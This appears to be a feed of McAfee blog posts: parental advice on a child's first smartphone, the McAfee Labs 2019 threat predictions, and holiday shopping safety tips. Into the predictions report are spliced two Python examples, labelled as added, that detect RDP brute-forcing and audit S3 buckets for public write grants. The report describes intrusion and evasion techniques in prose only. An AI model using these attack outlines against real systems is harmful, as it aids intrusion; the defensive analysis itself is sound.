Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points


  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding one’s personal information. Do you have the time to communicate, teach, and monitor your child’s online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others, opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones, in general, have become a public health concern. Put family rules in place that set time limits and phone free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.


The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani


Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, exposed remote desktop protocol (RDP) services offer another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with RDP reachable from the internet and weak or reused credentials, brute-force their way in, deploy ransomware, and propagate through the network either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.
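The pattern described above (a burst of failed logons from one address, then a successful RDP session) is straightforward to detect in Windows Security events. The following is an added example, not from the McAfee report; the events are constructed in a simplified shape rather than the raw 4625/4624 XML, and the choice to count failures per source IP regardless of logon type is an assumption explained in the code.

```python
"""Detect an RDP brute-force followed by a successful logon.
Added example; events are constructed and simplified."""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624
RDP_LOGON_TYPE = 10          # RemoteInteractive: an RDP session was established
WINDOW = timedelta(minutes=5)
THRESHOLD = 5

# Constructed events. Failures are counted whatever their logon type because
# with Network Level Authentication a failed RDP logon is recorded as
# logon type 3 (network); only the successful session shows up as type 10.
SAMPLE_EVENTS = [
    # burst against several accounts from one host, then a session as 'backup'
    {"time": "2018-11-12T02:00:01", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": "administrator"},
    {"time": "2018-11-12T02:00:04", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": "admin"},
    {"time": "2018-11-12T02:00:07", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": "administrator"},
    {"time": "2018-11-12T02:00:10", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": "backup"},
    {"time": "2018-11-12T02:00:13", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": "administrator"},
    {"time": "2018-11-12T02:00:16", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.5", "user": "backup"},
    {"time": "2018-11-12T02:00:20", "event_id": 4624, "logon_type": 10, "ip": "10.0.0.5", "user": "backup"},
    # a real user who mistypes twice and then gets in
    {"time": "2018-11-12T08:30:00", "event_id": 4625, "logon_type": 10, "ip": "192.168.1.20", "user": "jsmith"},
    {"time": "2018-11-12T08:30:09", "event_id": 4625, "logon_type": 10, "ip": "192.168.1.20", "user": "jsmith"},
    {"time": "2018-11-12T08:30:20", "event_id": 4624, "logon_type": 10, "ip": "192.168.1.20", "user": "jsmith"},
    # five failures spread over 40 minutes: never five inside one window
    {"time": "2018-11-12T09:00:00", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.9", "user": "svc"},
    {"time": "2018-11-12T09:10:00", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.9", "user": "svc"},
    {"time": "2018-11-12T09:20:00", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.9", "user": "svc"},
    {"time": "2018-11-12T09:30:00", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.9", "user": "svc"},
    {"time": "2018-11-12T09:40:00", "event_id": 4625, "logon_type": 3, "ip": "10.0.0.9", "user": "svc"},
]


def detect_rdp_bruteforce(events, threshold=THRESHOLD, window=WINDOW):
    """One alert per source IP that produced `threshold` failed logons inside
    `window`. The alert records whether an RDP session from that IP was
    established afterwards, which is the case that needs a response now."""
    recent = defaultdict(list)   # ip -> failure timestamps inside the window
    tried = defaultdict(set)     # ip -> accounts attempted
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        t, ip = datetime.fromisoformat(ev["time"]), ev["ip"]
        if ev["event_id"] == FAILED_LOGON:
            tried[ip].add(ev["user"])
            q = recent[ip]
            q.append(t)
            while t - q[0] > window:     # slide the window forward
                q.pop(0)
            if len(q) >= threshold:
                alert = alerts.setdefault(ip, {"ip": ip, "failures": 0,
                                               "users": tried[ip], "success_after": None})
                alert["failures"] = max(alert["failures"], len(q))
        elif (ev["event_id"] == SUCCESSFUL_LOGON
              and ev["logon_type"] == RDP_LOGON_TYPE and ip in alerts):
            alerts[ip]["success_after"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(f"{a['ip']}: {a['failures']} failures against {sorted(a['users'])}; "
              f"RDP session afterwards as: {a['success_after']}")
```

Tune the threshold and window to the environment; the slow trickle from 10.0.0.9 is the kind of low-and-slow attempt that needs a longer window or a per-account view to catch.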

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the Rig Exploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. Minerva Labs discovered WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDoS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaceted, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergistic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergistic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries’ tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service—especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced by customer misconfigurations) to launch cryptojacking or ransomware attacks, as well as other variants of MITM attacks.
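The misconfigured, publicly writable S3 buckets described above are a customer-side responsibility, so the practical defense is to audit bucket ACLs and bucket policies for public write grants. The following is an added example, not McAfee’s or AWS’s code: it takes the JSON shapes returned by `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` (the two sample documents are constructed; the group URIs are AWS’s real canned-group URIs, while the bucket name and owner ID are placeholders) and reports every grant or statement that lets the public write.

```python
import fnmatch
import json

# AWS canned-group URIs meaning "anyone on the internet" / "any AWS account".
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# ACL permissions that let a grantee add, overwrite or delete objects (WRITE)
# or change the ACL itself (WRITE_ACP).
WRITE_ACL_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# Concrete S3 actions a public principal should never be allowed.
WRITE_ACTIONS = ("s3:PutObject", "s3:DeleteObject", "s3:PutObjectAcl",
                 "s3:PutBucketAcl", "s3:PutBucketPolicy")


def _as_list(value):
    """Policy JSON allows either a string or a list in the same field."""
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    """True for Principal "*" or {"AWS": "*"} (any account, anonymous included)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def _grants_write(actions):
    """True if any action pattern (IAM wildcards, case-insensitive) covers a write action."""
    for pattern in _as_list(actions):
        for action in WRITE_ACTIONS:
            if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                return True
    return False


def public_write_acl_grants(acl):
    """Return (grantee_uri, permission) for every ACL grant giving the public write access."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if (grantee.get("Type") == "Group"
                and grantee.get("URI") in PUBLIC_GROUP_URIS
                and grant.get("Permission") in WRITE_ACL_PERMISSIONS):
            findings.append((grantee["URI"], grant["Permission"]))
    return findings


def public_write_policy_statements(policy):
    """Return Allow statements granting a write action to a public principal.

    Statements carrying a Condition are still reported (conditional=True):
    whether the condition really narrows the principal needs a human look.
    """
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_public(stmt.get("Principal")):
            continue
        if not _grants_write(stmt.get("Action", [])):
            continue
        findings.append({"sid": stmt.get("Sid"), "conditional": "Condition" in stmt})
    return findings


def audit_bucket(acl, policy):
    """Combine both checks into one report for a bucket."""
    return {
        "acl_public_write": public_write_acl_grants(acl),
        "policy_public_write": public_write_policy_statements(policy),
    }


# Constructed sample ACL: the owner plus a misconfigured WRITE grant to AllUsers,
# the kind of publicly writable bucket the GhostWriter scenario abuses.
SAMPLE_ACL = {
    "Owner": {"ID": "OWNER-CANONICAL-ID-PLACEHOLDER"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-CANONICAL-ID-PLACEHOLDER"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "WRITE"},
    ],
}

# Constructed sample policy: public read is intentional for a static site,
# but the second statement lets anyone upload or overwrite objects.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "OpenUpload", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:Put*"], "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
}

if __name__ == "__main__":
    print(json.dumps(audit_bucket(SAMPLE_ACL, SAMPLE_POLICY), indent=2))
```

Run against real output by piping the two `aws s3api` JSON documents through `json.load`; a clean bucket returns empty lists for both keys.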

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured Wi-Fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public Wi-Fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL, its design, and its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” other embedded websites your browser talks to, such as advertisers and website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

